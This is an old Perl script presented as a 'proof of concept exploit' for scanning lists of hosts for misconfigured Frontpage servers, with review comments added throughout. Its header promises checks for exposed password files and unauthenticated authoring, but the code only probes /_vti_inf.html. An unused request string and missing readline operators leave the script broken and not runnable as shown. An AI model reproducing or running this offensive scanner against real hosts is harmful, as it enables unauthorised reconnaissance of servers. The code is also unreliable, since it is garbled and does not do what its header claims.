#!/usr/bin/perl
# Various checks on Frontpage servers
# Written by bansh33 of r00tabega.com [bansh33@r00tabega.com]
# www.r00tabega.com
# ---------------------------------------------------------------------------------------------------------------
# Everybody knows about the _vti_pvt password files, but
# what about those misconfigured Frontpage servers that allow
# remote login and authoring without a login and password?
# This script will scan for both vulnerabilities.
# Makes for a quick and easy hack.
# Note: This script is merely a proof of concept exploit, as such, the code probably isn't very clean.
#
# Greetings to Siegesoft, attrition, eEye, w00w00, USSR Labs, ADM, el8, phedz, and others I forgot to mention.
#
# Greetz to all of r00tabega -- my clique for life: busdr1v3r, Griffon, ytcracker, dilusi0n, Axtrex
#
# propz to my mommy and daddy cuz they make me drink my milk
#
# Currently, this code *requires* Lynx. In a future version I may eliminate the dependency on it.
# ------begin c0de------------------------------------------------------------------------------------------------
# NOTE(review): no `use strict; use warnings;` anywhere in the file -- every variable
# below is an unchecked package global.
use Socket;
# NOTE(review): $postdata is assigned here but never referenced again on this page, and
# no Lynx invocation appears in the code that follows despite the header's claim; it looks
# like a leftover from the "authoring" check the header describes. The literal also holds
# embedded whitespace ("li stRecurse", "listBord ers") that looks like line-wrap damage.
$postdata = "method\=list\+documents\%3a3\%2e0\%2e2\%2e1706\&service\%5fname\=\&listHiddenDocs\=true\&listExplorerDocs\=true\&li stRecurse\=false\&listFiles\=true\&listFolders\=true\&listLinkInfo\=true\&listIncludeParent\=true\&listDerivedT\=false\&listBord ers\=false"; # This string of postdata usually works, but you may want to modify this.
# Banner, then require the host-list path as the sole command-line argument.
print "[Frontpage Smack by bansh33 of r00tabega]\n";
print "[ -www.r00tabega.com- ]\n\n";
if (!($ARGV[0])) {
    print "usage: ./frontpage.pl [file with hostnames to check]\n";
    exit;
}
$filetoopen = $ARGV[0];
# NOTE(review): two-arg open on a bareword handle with no failure check. The mode is
# parsed out of the filename itself, so an argument beginning with '>' or ending in '|'
# changes what open() does; prefer
# `open(my $fh, '<', $filetoopen) or die "open $filetoopen: $!";`.
open(thefile,$filetoopen);
# NOTE(review): the readline operator is missing (`@thefile = ;` is a syntax error);
# presumably `<thefile>` was lost when the page was rendered. The lines are never
# chomped, so each $host below would still carry its trailing newline -- confirm
# against the original source.
@thefile = ;
close(thefile);
foreach $host (@thefile) {
    # NOTE(review): inet_aton() runs before the resolution check further down; when it
    # returns undef, sockaddr_in() is handed an undefined address (Socket may croak there).
    $serverIP = inet_aton($host);
    $serverAddr = sockaddr_in(80, $serverIP);    # plain HTTP on port 80 only
    $number = 0;    # never read
    print "\n\nChecking $host for the Frontpage configuration file:\n\n";
    # NOTE(review): socket() result is unchecked; the bareword handle CLIENT is reopened
    # on every iteration and never close()d.
    socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
    # gethostbyname() is called twice for the same host; both failure messages are
    # printed without a trailing newline.
    gethostbyname($host) or print "No IP address";
    if(!gethostbyname($host)) {
        print "Can't Resolve DNS/IP";
    } else {
        # A failed connect() prints nothing, so the host is silently skipped.
        if(connect(CLIENT, $serverAddr)) {
            # Minimal HTTP/1.0 request with "\n\n" line endings and no Host: header;
            # the return value of send() is not checked.
            send(CLIENT,"GET /_vti_inf.html HTTP/1.0\n\n",0);
            # NOTE(review): readline operator missing again (presumably `<CLIENT>`);
            # only the first response line -- the status line -- is ever read.
            $check=;
            ($http,$code,$therest) = split(/ /,$check);
            # Any status other than 200 (redirects, 401, 403, ...) is reported as "not found".
            if($code == 200) {
                print "Found Frontpage configuration file...\n";
            } else {
                print "Cannot Find Frontpage configuration...\n";
            }
        }
    }
}
print "Scan complete.\n";